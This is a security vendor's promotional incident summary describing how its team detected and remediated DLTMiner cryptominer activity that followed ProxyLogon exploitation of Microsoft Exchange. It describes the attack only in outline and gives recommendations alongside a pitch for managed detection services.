Adversaries don’t work 9-5 and neither do we. At eSentire, our 24/7 SOCs are staffed with Elite Threat Hunters and Cyber Analysts who hunt, investigate, contain and respond to threats within minutes.
We have discovered some of the most dangerous threats and nation state attacks in our space – including the Kaseya MSP breach and the more_eggs malware.
Our Security Operations Centers are supported with Threat Intelligence, Tactical Threat Response and Advanced Threat Analytics driven by our Threat Response Unit – the TRU team.
In TRU Positives, eSentire’s Threat Response Unit (TRU) provides a summary of a recent threat investigation. We outline how we responded to the confirmed threat and what recommendations we have going forward.
Here’s the latest from our TRU Team…
- What Did We Find?
- Suspected DLTMiner activity. Scheduled task attempting to execute PowerShell code on a server
- This intrusion is attributed back to a DLTMiner campaign targeting on-premise Microsoft Exchange servers using common IOCs
- External research reports have the earliest sighting of this campaign taking place 5-Mar-2021 where threat actors began to target externally accessible Exchange Servers vulnerable to ProxyLogon
- How Did We Find It?
- Detected in the midst of onboarding a business services organization
- Our Machine Learning PowerShell classifier detected a download of a malicious secondary stage payload
- Our 24/7 SOC was alerted and investigated
- What Did We Do?
- Confirmed this incident was directly tied to ProxyLogon vulnerabilities
- Mapped remaining foothold using multi-signal investigation across network, endpoint, log sources
- Identified patient zero
- Provided recommendations and support to patch and remediate exposed systems including MS Exchange
- What Can You Learn From this TRU Positive?
- The activity we detected involved post-compromise download of a second stage payload on a non-Exchange server
- This case demonstrates the speed at which attackers can leverage an initial entry point (the ProxyLogon Exchange server vulnerabilities) to establish a foothold on other systems and persist beyond patching
- Luckily this business was in the process of onboarding so we were able to detect the threat, contain it and support with remediation
- At eSentire we onboard with an “assume compromised strategy” so we baseline your environment activity assuming the worst-case scenario (it’s malicious) and adjust thresholds over time
- Ask yourself…
- Have you proactively patched and remediated vulnerabilities in your Exchange server tied to ProxyLogon?
- Are you able to detect and block appliable Indicators of Compromise (IOCs)?
- Can you track threat actor lateral movement across your environment?
- What level of incident response support do you have to fully remediate and recover from a similar threat?
- What signal sources are available to your team for investigation? In this case we leveraged network, endpoint and log sources to identify the full scope of the threat actor’s presence.
If you are not currently engaged with a Managed Detection and Response provider, we highly recommend you partner with us for security services in order to disrupt threats before they impact your business.
Want to learn more? Connect with an eSentire Security Specialist.